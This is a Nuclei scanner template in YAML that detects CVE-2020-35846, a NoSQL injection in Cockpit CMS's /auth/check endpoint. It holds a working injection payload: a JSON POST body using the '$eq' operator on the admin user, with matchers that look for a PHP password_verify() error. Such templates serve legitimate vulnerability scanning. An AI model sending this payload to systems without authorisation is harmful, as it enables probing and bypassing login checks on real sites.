39 lines
912 B
YAML
39 lines
912 B
YAML
id: CVE-2020-35846
|
|
|
|
info:
|
|
name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.
|
|
The $eq operator matches documents where the value of a field equals the specified value.
|
|
reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
|
|
tags: cve,cve2020,nosqli,sqli
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/auth/check"
|
|
headers:
|
|
Content-Type: application/json
|
|
body: |
|
|
{
|
|
"auth": {
|
|
"user": {
|
|
"$eq": "admin"
|
|
},
|
|
"password": [
|
|
0
|
|
]
|
|
}
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "password_verify() expects parameter" |